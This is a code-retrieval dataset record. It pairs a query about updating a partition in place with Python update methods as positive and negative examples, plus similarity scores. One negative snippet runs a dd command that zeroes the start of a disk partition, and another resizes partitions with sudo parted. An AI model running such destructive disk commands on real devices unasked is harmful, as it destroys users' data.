"async def do_update(self, data):\n old = await self.config()\n\n new = old.copy()\n new.update(data)\n\n verrors = ValidationErrors()\n\n for attr, minlen, maxlen in (\n ('access_key', 5, 20),\n ('secret_key', 8, 40),\n ):\n curlen = len(new.get(attr, ''))\n if curlen < minlen or curlen > maxlen:\n verrors.add(\n f's3_update.{attr}', f'Attribute should be {minlen} to {maxlen} in length'\n )\n\n if not new['storage_path']:\n verrors.add('s3_update.storage_path', 'Storage path is required')\n else:\n await check_path_resides_within_volume(\n verrors, self.middleware, 's3_update.storage_path', new['storage_path']\n )\n\n if not verrors:\n if new['storage_path'].rstrip('/').count('/') < 3:\n verrors.add(\n 's3_update.storage_path',\n 'Top level datasets are not allowed. i.e /mnt/tank/dataset is allowed'\n )\n else:\n # If the storage_path does not exist, let's create it\n if not os.path.exists(new['storage_path']):\n os.makedirs(new['storage_path'])\n\n if new['certificate']:\n verrors.extend((await self.middleware.call(\n 'certificate.cert_services_validation', new['certificate'], 's3_update.certificate', False\n )))\n\n if new['bindip'] not in await self.bindip_choices():\n verrors.add('s3_update.bindip', 'Please provide a valid ip address')\n\n if verrors:\n raise verrors\n\n new['disks'] = new.pop('storage_path')\n\n await self._update_service(old, new)\n\n if (await self.middleware.call('filesystem.stat', new['disks']))['user'] != 'minio':\n await self.middleware.call(\n 'filesystem.setperm',\n {\n 'path': new['disks'],\n 'mode': str(775),\n 'uid': (await self.middleware.call('dscache.get_uncached_user', 'minio'))['pw_uid'],\n 'gid': (await self.middleware.call('dscache.get_uncached_group', 'minio'))['gr_gid'],\n 'options': {'recursive': True, 'traverse': False}\n }\n )\n\n return await self.config()",
"def update(self, attributes=None):\n\n if attributes is None:\n attributes = {}\n\n headers = self.__class__.create_headers(attributes)\n headers.update(self._update_headers())\n\n result = self._client._put(\n self.__class__.base_url(\n self.sys['id']\n ),\n self.__class__.create_attributes(attributes, self),\n headers=headers\n )\n\n self._update_from_resource(result)\n\n return self",
"def test_partitioner(self):\n args = \"xyzzy\", set([1, 2, 3])\n partitioner = self.tx_client.SetPartitioner(*args)\n self.assertEqual(partitioner.state, PartitionState.ALLOCATING)\n self.assertEqual(partitioner._partitioner.args, args)\n self.assertEqual(partitioner._partitioner.kwargs, {})\n\n partitioner._partitioner.state = PartitionState.ACQUIRED\n self.assertEqual(partitioner.state, PartitionState.ACQUIRED)",
"def _updateComputePartitionRelatedInstanceList(self, compute_node_id,\n compute_partition_id, instance_reference_xml):\n software_instance_document = self.\\\n _getSoftwareInstanceForComputePartition(compute_node_id,\n compute_partition_id)\n\n software_instance_document._updateSucessorList(instance_reference_xml)",
"def update(self, instance, validated_data):\n validated_data.pop(\"assignment\", None)\n return super().update(instance, validated_data)"
] | [
"0.6177643",
"0.5935486",
"0.5843581",
"0.5752055",
"0.57170105",
"0.5648424",
"0.55954295",
"0.5566008",
"0.5558529",
"0.5553988",
"0.55241215",
"0.55186415",
"0.53778905",
"0.530752",
"0.52931553",
"0.5265223",
"0.52628785",
"0.52362907",
"0.52102923",
"0.5176496",
"0.5165835",
"0.51582414",
"0.51418966",
"0.5138581",
"0.5136336",
"0.51306844",
"0.51306844",
"0.5115434",
"0.511426",
"0.5112654",
"0.5100001",
"0.50839776",
"0.50774",
"0.50539404",
"0.50445604",
"0.50263244",
"0.5016713",
"0.49977466",
"0.4988132",
"0.49879402",
"0.49723837",
"0.49512157",
"0.49445704",
"0.4939721",
"0.4937224",
"0.49345723",
"0.49220002",
"0.49079508",
"0.4907716",
"0.49061668",
"0.49038306",
"0.49013907",
"0.4897912",
"0.48926076",
"0.48765892",
"0.4865309",
"0.48609567",
"0.48551986",
"0.48513556",
"0.48511103",
"0.4848271",
"0.48444796",
"0.48350972",
"0.48348364",
"0.48344043",
"0.48332426",
"0.48301762",
"0.48251054",
"0.48064703",
"0.48052517",
"0.48048276",
"0.480245",
"0.47963625",
"0.4788364",
"0.47784653",
"0.47658443",
"0.47645998",
"0.47591382",
"0.47582895",
"0.47571534",
"0.47470367",
"0.4746949",
"0.47457156",
"0.47455892",
"0.47448665",
"0.47421604",
"0.47391418",
"0.47386515",
"0.47377482",
"0.47373757",
"0.47331905",
"0.4730649",
"0.47275564",
"0.47259858",
"0.4711035",
"0.46964675",
"0.46880496",
"0.46857172",
"0.46812508",
"0.4680434",
"0.4680145"
] | 0.0 | -1 |
Completely update the partition with another partition's attributes in place. | def update_inplace_from(self, other):
self.__dict__ = other.__dict__.copy() | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update(self, metadata):\n p_metas = metadata.partitions\n\n # Remove old partitions\n removed = set(self._partitions.keys()) - set(p_metas.keys())\n if len(removed) > 0:\n log.info('Removing %d partitions', len(removed))\n for id_ in removed:\n log.debug('Removing partition %s', self._partitions[id_])\n self._partitions.pop(id_)\n\n # Add/update current partitions\n brokers = self._cluster.brokers\n if len(p_metas) > 0:\n log.info(\"Adding %d partitions\", len(p_metas))\n for id_, meta in iteritems(p_metas):\n if meta.leader not in brokers:\n raise LeaderNotAvailable()\n if meta.id not in self._partitions:\n log.debug('Adding partition %s/%s', self.name, meta.id)\n self._partitions[meta.id] = Partition(\n self, meta.id,\n brokers[meta.leader],\n [brokers[b] for b in meta.replicas],\n [brokers[b] for b in meta.isr],\n )\n else:\n self._partitions[id_].update(brokers, meta)",
"def _setPartedPartition(self, partition):\n log_method_call(self, self.name)\n\n if partition is not None and not isinstance(partition, parted.Partition):\n raise ValueError(\"partition must be None or a parted.Partition instance\")\n\n log.debug(\"device %s new partedPartition %s\", self.name, partition)\n self._partedPartition = partition\n self.updateName()",
"def update_partition(self, event) -> None:\n self.min_width = 150 * len(self.partition)\n self.request_update()",
"def update(self, instance, validated_data):\n for attr, value in list(validated_data.items()):\n if attr == 'part_details':\n for a, v in list(value.items()):\n setattr(instance.part_details, attr, value)\n else:\n setattr(instance, attr, value)\n instance.save()\n return instance",
"def disk_update(context, disk_id, values):\n return NotImplemented",
"def partition2(self, partition2):\n\n self._partition2 = partition2",
"def update_partition(self, bulk_ad_group_product_partition):\n\n if bulk_ad_group_product_partition is not None and bulk_ad_group_product_partition.ad_group_criterion is not None:\n bulk_ad_group_product_partition.ad_group_criterion.AdGroupId=self._ad_group_id\n bulk_ad_group_product_partition.ad_group_criterion.Status=None\n if hasattr(bulk_ad_group_product_partition.ad_group_criterion, 'EditorialStatus'):\n bulk_ad_group_product_partition.ad_group_criterion.EditorialStatus=None\n self._partition_actions.append(bulk_ad_group_product_partition)",
"def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)",
"def update_part(session=None, data=None):\n data_dict = format_and_check_update_part_request(data)\n if data_dict is None:\n return False\n\n with mc.MCSessionWrapper(session=session) as session:\n for dkey, dval in data_dict.items():\n hpn_to_change = dval[0][0]\n rev_to_change = dval[0][1]\n part_rec = session.query(Parts).filter(\n (func.upper(Parts.hpn) == hpn_to_change.upper())\n & (func.upper(Parts.hpn_rev) == rev_to_change.upper())\n )\n num_part = part_rec.count()\n if num_part == 0:\n part = Parts()\n elif num_part == 1:\n part = part_rec.first()\n set_an_attrib = False\n for d in dval:\n try:\n getattr(part, d[2])\n setattr(part, d[2], d[3])\n set_an_attrib = True\n except AttributeError:\n print(d[2], \"does not exist as a field\")\n continue\n if set_an_attrib:\n session.add(part)\n session.commit()\n cm_utils.log(\"cm_partconnect part update\", data_dict=data_dict)\n\n return True",
"def PatchPartition(self, target, source, patch):\n self._CheckSecondTokenNotSlotSuffixed(target, \"PatchPartitionExpr\")\n self._CheckSecondTokenNotSlotSuffixed(source, \"PatchPartitionExpr\")\n self.PatchPartitionExpr('\"%s\"' % target, '\"%s\"' % source, '\"%s\"' % patch)",
"def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()",
"def update(self, other):\n for name, value in other.items():\n self.__setitem__(name, value)",
"def _computeResize(self, partition, newsize=None):\n log_method_call(self, self.name, status=self.status)\n\n if newsize is None:\n newsize = self.targetSize\n\n # compute new size for partition\n currentGeom = partition.geometry\n currentDev = currentGeom.device\n newLen = int(newsize) / currentDev.sectorSize\n newGeometry = parted.Geometry(device=currentDev,\n start=currentGeom.start,\n length=newLen)\n # and align the end sector\n if newGeometry.length < currentGeom.length:\n align = self.disk.format.endAlignment.alignUp\n alignGeom = currentGeom # we can align up into the old geometry\n else:\n align = self.disk.format.endAlignment.alignDown\n alignGeom = newGeometry\n\n newGeometry.end = align(alignGeom, newGeometry.end)\n constraint = parted.Constraint(exactGeom=newGeometry)\n\n return (constraint, newGeometry)",
"def _setSize(self, newsize):\n log_method_call(self, self.name,\n status=self.status, size=self._size, newsize=newsize)\n if not isinstance(newsize, Size):\n raise ValueError(\"new size must of type Size\")\n\n if not self.exists:\n # device does not exist (a partition request), just set basic values\n self._size = newsize\n self.req_size = newsize\n self.req_base_size = newsize\n\n if self.exists:\n super(PartitionDevice, self)._setSize(newsize)\n return\n\n # the rest is for changing the size of an allocated-but-not-existing\n # partition, which I'm not sure is advisable\n if self.disk and newsize > self.disk.size:\n raise ValueError(\"partition size would exceed disk size\")\n\n if not self.partedPartition:\n log.warn(\"No partedPartition, not adjusting geometry\")\n return\n\n maxAvailableSize = Size(self.partedPartition.getMaxAvailableSize(unit=\"B\"))\n\n if newsize > maxAvailableSize:\n raise ValueError(\"new size is greater than available space\")\n\n # now convert the size to sectors and update the geometry\n geometry = self.partedPartition.geometry\n physicalSectorSize = geometry.device.physicalSectorSize\n\n new_length = int(newsize) / physicalSectorSize\n geometry.length = new_length",
"def update(self, other):\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Torrent):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def partition1(self, partition1):\n\n self._partition1 = partition1",
"def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current",
"def update(self, other):\n _merge_dicts(self, other)",
"def preCommitFixup(self):\n log_method_call(self, self.name)\n if not self.exists or not self.disklabelSupported:\n return\n\n # find the correct partition on the original parted.Disk since the\n # name/number we're now using may no longer match\n _disklabel = self.disk.originalFormat\n\n if self.isExtended:\n # getPartitionBySector doesn't work on extended partitions\n _partition = _disklabel.extendedPartition\n log.debug(\"extended lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n else:\n # lookup the partition by sector to avoid the renumbering\n # nonsense entirely\n _sector = self.partedPartition.geometry.start\n _partition = _disklabel.partedDisk.getPartitionBySector(_sector)\n log.debug(\"sector-based lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n\n self.partedPartition = _partition",
"def _update(self, device=None):\n self._attr_available = True\n self.schedule_update_ha_state(True)",
"def set_partition(self, begin=0, end=0):\r\n self.partition = (begin, end)",
"def update(self, other):\n\n fields = None\n if isinstance(other, dict):\n fields = other\n elif isinstance(other, Session):\n fields = other.fields\n else:\n raise ValueError('Cannot update with supplied data')\n\n for k, v in fields.iteritems():\n self.fields[k.replace('-', '_')] = v",
"def update(self, other):\n b = self.hallucinate_merge(other)\n self.l_child = b.l_child\n self.r_child = b.r_child",
"def hard_update(self,target, source):\n\t\tfor target_param, param in zip(target.parameters(), source.parameters()):\n\t\t\t\ttarget_param.data.copy_(param.data)",
"def update(self, **values):\r\n if self.__abstract__:\r\n raise ThunderdomeException('cant update abstract elements')\r\n self.pre_update(**values)\r\n for key in values.keys():\r\n if key not in self._columns:\r\n raise TypeError(\"unrecognized attribute name: '{}'\".format(key))\r\n\r\n for k,v in values.items():\r\n setattr(self, k, v)\r\n\r\n return self.save()",
"def partitioning_attribute(self, partitioning_attribute):\n\n self._partitioning_attribute = partitioning_attribute",
"def _lock_partition(self, partition, shared=False):\n pass",
"def update_device(self, dev_dict):\n # Note(jprabh1x): added bus,slot,function into fields dict as \n # seperate fields.\n no_changes = ('status', 'instance_uuid', 'id', 'extra_info', 'workload')\n map(lambda x: dev_dict.pop(x, None),\n [key for key in no_changes])\n\n # Note(jprabh1x): populating values for bus,slot,function from address in dev_dict.\n if dev_dict.has_key(\"address\"):\n \t\taddress = pci_utils.parse_address(dev_dict[\"address\"])\n \t\tdev_dict.update({'bus':str(address[1]), 'slot':str(address[2]), 'function':str(address[3])})\n for k, v in dev_dict.items():\n if k in self.fields.keys():\n self[k] = v\n else:\n extra_info = self.extra_info\n extra_info.update({k: str(v)})\n self.extra_info = extra_info",
"def update(self, other: dict):\n for key in other:\n if key in self:\n self[key] = other[key]",
"def test_partial_updates(self):\r\n m1 = TestSetModel.create(int_set={1, 2, 3, 4})\r\n\r\n m1.int_set.add(5)\r\n m1.int_set.remove(1)\r\n assert m1.int_set == {2, 3, 4, 5}\r\n\r\n m1.save()\r\n\r\n m2 = TestSetModel.get(partition=m1.partition)\r\n assert m2.int_set == {2, 3, 4, 5}",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def update(self, old, new):\n i = self.rank[old] # change value at index i\n del self.rank[old]\n self.heap[i] = new\n self.rank[new] = i\n if old < new: # maintain heap order\n self.down(i)\n else:\n self.up(i)",
"def perform_swap(self, replica_i, replica_j):\n param_i = replica_i.parameter\n replica_i.parameter = replica_j.parameter\n replica_j.parameter = param_i",
"def perform_update(self, serializer):\n extra_data = self.get_additional_data(False)\n serializer.save(**extra_data)",
"def set_partition(self, partition=0):\n if not isinstance(partition, int):\n raise TypeError('partition must be an integer')\n if partition <= 0:\n raise ValueError('partition must be positive')\n if self.connected:\n self.producer.send(\"PART:\"+str(partition))",
"def provide_partition_info(self):\n self.partition_info = True",
"def update(self, other={}, **kwargs):\n joined = dict(other, **kwargs)\n\n # Update with the new set of k:v pairs,\n # but delete existing keys which are being assigned the value of None\n for k, v in joined.items():\n if v is None:\n if k in self:\n del self[k]\n else:\n self[k] = v",
"def update(self, dbase):\n dbase.updateVirtualSpace(\n self.__id,\n self.__name,\n self.__host,\n self.__size\n )",
"def hard_update(target, source):\n for target_param, param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(param.data)",
"def update(self):\n with managed_session() as session:\n session.merge(self)",
"def update(self, idx: int, new_priority: T.Union[int, float]):\n old_priority, item = self.__heap[idx]\n self.__heap[idx] = (new_priority, item)\n\n if new_priority < old_priority:\n self.__sift_up(idx)\n else:\n self.__sift_down(idx)",
"def expand_second_partition(device):\n\n print('Deleting the original boot partition from the thumb drive')\n _delete_partition(device, 1)\n\n print('Expanding the partition. Resizing isn\\'t worth it. Or obvious to do.')\n resize_command = ['sudo', 'parted', device.path, 'resizepart', '2', '\"-1s\"']\n interactive_console(resize_command)\n\n print('Fixing the nibbly bits for the partition itself')\n target_partition = device.partitions(full_paths=True)[0]\n interactive_console(['sudo', 'e2fsck', '-f', target_partition])\n\n print('Fixing ext4 so it goes all the way to the end')\n target_end = device.partition_specs(2)['End']\n interactive_console(['sudo', 'resize2fs', target_partition, target_end])\n\n print('Success!')",
"def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)",
"def refresh(self, context=None):\n current = self.__class__.get_by_uuid(self._context,\n cluster=self.cluster_id,\n uuid=self.uuid)\n for field in self.fields:\n if self.obj_attr_is_set(field) and self[field] != current[field]:\n self[field] = current[field]",
"def on_edit_clicked(self,button):\n\t\tself.list_partitions.edit_partition()",
"def update(self, attributes=None):\n\n if attributes is None:\n attributes = {}\n\n headers = self.__class__.create_headers(attributes)\n headers.update(self._update_headers())\n\n result = self._client._put(\n self.__class__.base_url(\n self.sys['id']\n ),\n self.__class__.create_attributes(attributes, self),\n headers=headers\n )\n\n self._update_from_resource(result)\n\n return self",
"def _pd_update(pd, fields):\n pd.name = fields['name']\n pd.price = fields['price']\n pd.quantity_per_package = fields['quantity_per_package']\n pd.unit = fields['unit']\n pd.quantity_limit = fields['quantity_limit']\n pd.unit_weight = fields['unit_weight']\n pd.quantum = fields['quantum']",
"def update_dict(new,old):",
"def get_assignment_for_partition_update(self, topic_name, partitions):\n all_brokers = []\n assign = {'partitions': {}, 'version': 1}\n\n _, _, _, replicas, _, _ = self.get_partitions_for_topic(topic_name)[0]\n total_replica = len(replicas)\n\n for node_id, _host, _port, _rack in self.get_brokers():\n all_brokers.append(node_id)\n brokers_iterator = itertools.cycle(all_brokers)\n\n for i in range(partitions):\n assign_tmp = []\n for _j in range(total_replica):\n assign_tmp.append(next(brokers_iterator))\n assign['partitions'][str(i)] = assign_tmp\n\n return bytes(str(json.dumps(assign)).encode('ascii'))",
"def update(self,\n tier1_id,\n segment_id,\n port_id,\n segment_port,\n ):\n return self._invoke('update',\n {\n 'tier1_id': tier1_id,\n 'segment_id': segment_id,\n 'port_id': port_id,\n 'segment_port': segment_port,\n })",
"def update_obj(obj, attributes, params):\n for key in params.keys():\n if key in attributes:\n try:\n set_attribute(obj, key, params[key])\n except:\n abort(400)\n \n Session.flush()\n Session.commit()",
"def save_partition(self, partition):\n raise NotImplementedError('save_file')",
"def FormatPartition(self, partition):\n\n fstab = self.fstab\n if fstab:\n p = fstab[partition]\n self.script.append('format(\"%s\", \"%s\", %s, \"%s\", \"%s\");' %\n (p.fs_type, common.PARTITION_TYPES[p.fs_type],\n self._GetSlotSuffixDeviceForEntry(p),\n p.length, p.mount_point))",
"def _update(self, datapoints):\r\n if len(datapoints) == 1:\r\n timestamp, value = datapoints[0]\r\n whisper.update(self.path, value, timestamp)\r\n else:\r\n whisper.update_many(self.path, datapoints)",
"def copyAttributes(self, other, add_nxpars=False):\n import copy\n \n self.setTitle(other.getTitle())\n self.setDataSetType(other.getDataSetType())\n self.setAllAxisLabels(other.getAllAxisLabels())\n self.setAllAxisUnits(other.getAllAxisUnits())\n self.setYLabel(other.getYLabel())\n self.setYUnits(other.getYUnits())\n if len(self.attr_list.keys()) == 0:\n self.attr_list = copy.copy(other.attr_list)\n else:\n self.attr_list.instrument = copy.copy(other.attr_list.instrument)\n self.attr_list.sample = copy.copy(other.attr_list.sample)\n\n if add_nxpars:\n nxpar_keys = [item[0] for item in self.attr_list.iteritems() \\\n if isinstance(item[1], NxParameter)]\n\n for nxpar_key in nxpar_keys:\n self.attr_list[nxpar_key] += other.attr_list[nxpar_key]\n else:\n # Do nothing\n pass\n \n keys_to_get = [other_key for other_key in other.attr_list \\\n if other_key not in self.attr_list]\n \n for key_to_get in keys_to_get:\n self.attr_list[key_to_get] = \\\n copy.copy(other.attr_list[key_to_get])",
"def partitionname(self, partitionname) :\n\t\ttry :\n\t\t\tself._partitionname = partitionname\n\t\texcept Exception as e:\n\t\t\traise e",
"def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)",
"def on_partition_change(self, new_partitions):\n if new_partitions is None:\n self.conn.create(self.partition_path, value=self.partitions)\n return\n\n if new_partitions != self.partitions:\n self.partitions = new_partitions\n self.rebalance()\n\n self.partitions_collected.set()",
"def copy(self):\n new = Partition.__new__(Partition)\n new.__dict__ = self.__dict__.copy()\n\n self._increment_file_counter()\n\n return new",
"def _update(self, other):\n # NOTE: detail map properties should NEVER be overridden. NEVER. EVER. kthx.\n if other.use_alpha:\n self.use_alpha = True\n if other.mipmap:\n self.mipmap = True",
"def update(self, instance, validated_data):\n instance.product_name = validated_data.get('product_name', instance.product_name)\n instance.product_mrp = validated_data.get('product_mrp', instance.product_mrp)\n instance.save()\n return instance",
"def partition_session(self):\n if self.user['drive']['name'] is not None:\n\n # Set root size\n if self.user['root_freespace'] is True:\n self.user['root_size'] = 'freespace'\n\n # Set partition parameters\n self.user['partitions'] = {'name': ['boot', 'root'],\n 'size': [self.user['boot_size'],\n self.user['root_size']],\n 'filesystem': ['fat32', 'ext4'],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap size and filesystem\n if 'Swap' in self.user['optional_partitions']:\n self.user['partitions']['size'].insert(1, self.user['swap_size'])\n self.user['partitions']['filesystem'].insert(1, 'swap')\n\n # Set home size and filesystem\n if 'Home' in self.user['optional_partitions']:\n if self.user['home_freespace'] is True:\n self.user['home_size'] = 'freespace'\n self.user['partitions']['size'].append(self.user['home_size'])\n self.user['partitions']['filesystem'].append('ext4')\n\n # Custom partitions\n else:\n\n # Set partition parameters\n self.user['partitions'] = {\n 'name': ['boot', 'root'],\n 'drive_id': [self.user['boot_id'].split()[0],\n self.user['root_id'].split()[0]],\n 'mountpoint': ['/mnt/boot', '/mnt'],\n 'mountorder': [1, 0]}\n\n # Set swap drive ID\n if self.user['swap_id'] is not None:\n self.user['partitions']['drive_id'].insert(\n 1, self.user['swap_id'].split()[0])\n\n # Set home drive ID\n if self.user['home_id'] is not None:\n self.user['partitions']['drive_id'].append(\n self.user['home_id'].split()[0])\n\n # Set swap parameters\n if ('Swap' in self.user['optional_partitions']) or \\\n (self.user['swap_id'] is not None):\n self.user['partitions']['name'].insert(1, 'swap')\n self.user['partitions']['mountpoint'].insert(1, 'swap')\n self.user['partitions']['mountorder'].insert(1, 2)\n\n # Set home parameters\n if 'Home' in self.user['optional_partitions'] or \\\n (self.user['home_id'] is not None):\n self.user['partitions']['name'].append('home')\n self.user['partitions']['mountpoint'].append('/mnt/home')\n self.user['partitions']['mountorder'].append(3)",
"def partition_key(self, partition_key):\n\n self._partition_key = partition_key",
"def update(self):\n\n raise NotImplementedError('Must be implemented by subclasses')",
"async def do_update(self, data):\n old = await self.config()\n\n new = old.copy()\n new.update(data)\n\n verrors = ValidationErrors()\n\n for attr, minlen, maxlen in (\n ('access_key', 5, 20),\n ('secret_key', 8, 40),\n ):\n curlen = len(new.get(attr, ''))\n if curlen < minlen or curlen > maxlen:\n verrors.add(\n f's3_update.{attr}', f'Attribute should be {minlen} to {maxlen} in length'\n )\n\n if not new['storage_path']:\n verrors.add('s3_update.storage_path', 'Storage path is required')\n else:\n await check_path_resides_within_volume(\n verrors, self.middleware, 's3_update.storage_path', new['storage_path']\n )\n\n if not verrors:\n if new['storage_path'].rstrip('/').count('/') < 3:\n verrors.add(\n 's3_update.storage_path',\n 'Top level datasets are not allowed. i.e /mnt/tank/dataset is allowed'\n )\n else:\n # If the storage_path does not exist, let's create it\n if not os.path.exists(new['storage_path']):\n os.makedirs(new['storage_path'])\n\n if new['certificate']:\n verrors.extend((await self.middleware.call(\n 'certificate.cert_services_validation', new['certificate'], 's3_update.certificate', False\n )))\n\n if new['bindip'] not in await self.bindip_choices():\n verrors.add('s3_update.bindip', 'Please provide a valid ip address')\n\n if verrors:\n raise verrors\n\n new['disks'] = new.pop('storage_path')\n\n await self._update_service(old, new)\n\n if (await self.middleware.call('filesystem.stat', new['disks']))['user'] != 'minio':\n await self.middleware.call(\n 'filesystem.setperm',\n {\n 'path': new['disks'],\n 'mode': str(775),\n 'uid': (await self.middleware.call('dscache.get_uncached_user', 'minio'))['pw_uid'],\n 'gid': (await self.middleware.call('dscache.get_uncached_group', 'minio'))['gr_gid'],\n 'options': {'recursive': True, 'traverse': False}\n }\n )\n\n return await self.config()",
"def update(self, attributes):\n for key in attributes:\n k = key.lower()\n if not isinstance(attributes[key], str) or attributes[key] != '':\n k_ = k.strip(' =:\\t\\n').replace('', '')\n self.attributes.update({k_: attributes[key]})\n elif k in self.attributes:\n del self.attributes[k]",
"def update(self, other: Mapping[str, Any]) -> None:\n self._config.update(self._flatten_dict(other))",
"def merge(self, new_attributes):\n for k, v in new_attributes.items():\n setattr(self, k, v)",
"def update(self):\n if self._skip_update:\n self._skip_update = False\n return\n\n try:\n for prop in AIRER_PROPS:\n self.status[prop] = self.send('get_prop', [prop])[0]\n _LOGGER.debug(\"MiioDevice update: %s\", self.status)\n self.available = True\n self._retry = 0\n except Exception as exc:\n _LOGGER.error(\"Error on update: %s\", exc)\n self._retry += 1\n if self._retry > 3:\n self.available = False\n\n for entity in self.update_entities:\n entity.async_schedule_update_ha_state()",
"def testUpdate(self):\n try:\n provU = ProvenanceProvider(self.__cfgOb, self.__cachePath, useCache=False)\n pD = {self.__provKeyName: self.__provInfoL}\n ok = provU.store(pD)\n self.assertTrue(ok)\n #\n ok = provU.update(pD)\n self.assertTrue(ok)\n #\n fD = provU.fetch()\n self.assertTrue(self.__provKeyName in fD)\n self.assertDictEqual(pD, fD)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()",
"def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n elif not args[0] in class_type:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif (\"{}.{}\".format(args[0], args[1]) not in storage.all().keys()):\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n new_dict = models.storage.all()\n tmp = \"{}.{}\".format(args[0], args[1])\n if tmp in new_dict.keys():\n attr = getattr(new_dict[tmp], args[2], \"\")\n setattr(new_dict[tmp], args[2], type(attr)(args[3]))\n new_dict[tmp].save()",
"def update(self):\n self.__execute(self.pkgin_bin, \"update\")",
"def test_partially_update_device_by_id1(self):\n pass",
"def update(self, key, node, local_edges, foreign_edges, transaction_id):\n assert self.row_exists(key, transaction_id), \"Key does not exist\"\n\n last_node = self.rows[key][-1]\n node = last_node.copy(node, local_edges, foreign_edges, transaction_id)\n self._create_or_update_row(key, node)",
"def addPartition(self,partitionData):\n self.PCAs[partitionData.id] = partitionData\n self.pcaStatemachineLock[partitionData.id] = threading.Lock()\n self.StateMachineForPca[partitionData.id] = Statemachine(self.StateMachineFile,\"Unconfigured\")\n self.isPCAinTransition[partitionData.id] = False\n self.pcaSequenceNumber[partitionData.id] = 0",
"def update(self, **params):\n self.parameters.update(params)",
"def update(cls) -> None:\n raise NotImplementedError",
"def do_update(self, args):\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if len(args) == 1:\n print(\"** instance id missing **\")\n return\n if len(args) == 2:\n print(\"** attribute name missing **\")\n return\n if len(args) == 3:\n print(\"** value missing **\")\n return\n if args[0] not in HBNBCommand.valid_classes.keys():\n print(\"** class doesn't exist **\")\n return\n all_objs = storage.all(args[0])\n for k, v in all_objs.items():\n if k == args[1]:\n setattr(v, args[2], args[3])\n storage.save()\n return\n print(\"** no instance found **\")",
"def update_rec(self):\n import copy\n \n self.leftrec, self.rightrec = copy.copy(self.rec), copy.copy(self.rec)\n self.leftrec[2*self.dim + 1], self.rightrec[2*self.dim] = self.node.dimension[self.dim], self.node.dimension[self.dim]",
"def visit_record(self, syrecord):\n for other_key, other_value in syrecord.items():\n try:\n getattr(self.current, other_key).update(other_value)\n except KeyError:\n setattr(self.current, other_key, other_value)",
"def update(self, *args, **kwargs):\n raise NotImplementedError",
"def update(self, other):\n if self.active:\n self.active.functor.update(other)",
"def update_orderbook(self, existing_orderbook_obj, instrument, market_place, market_segment, market_capability, \\\n tick_size_list, round_lot, day_count, orderbook_name, tiering_level, orderbook_curr=None):\n logger.DLOG(\"Updating orderbook...\") \n clone_obj = existing_orderbook_obj.Clone()\n clone_obj.Instrument = instrument\n if orderbook_curr:\n clone_obj.Currency = orderbook_curr\n else:\n clone_obj.Currency = instrument.Currency()\n clone_obj.Quotation = instrument.Quotation()\n clone_obj.MarketPlace = market_place\n clone_obj.RoundLot = self.get_round_lot(instrument, round_lot)\n #clone_obj.PhysicalMarketSegment(market_segment)\n clone_obj.Name = orderbook_name\n clone_obj.QuoteFactor = 1\n clone_obj.TickSizeList = self.get_tick_size_list(tick_size_list, market_capability)\n if str(tiering_level):\n clone_obj.ExternalType = tiering_level\n clone_obj.ExternalId = orderbook_name\n\n try: \n existing_orderbook_obj.Apply(clone_obj)\n existing_orderbook_obj.Commit() \n \n #group_map = self.get_list_leaf(clone_obj,market_segment) \n #if group_map and clone_obj.GroupMaps().IndexOf(group_map) <0 :\n # clone_obj.GroupMaps().Add(group_map) \n # clone_obj.GroupMaps().Commit() \n \n logger.LOG(\"**Successfully** updated orderbook information: <%s> for instrument <%s>\"%(orderbook_name, instrument.Name()))\n except Exception as e:\n logger.ELOG('**Error** while updating OrderBook %s : %s'%(orderbook_name, e))",
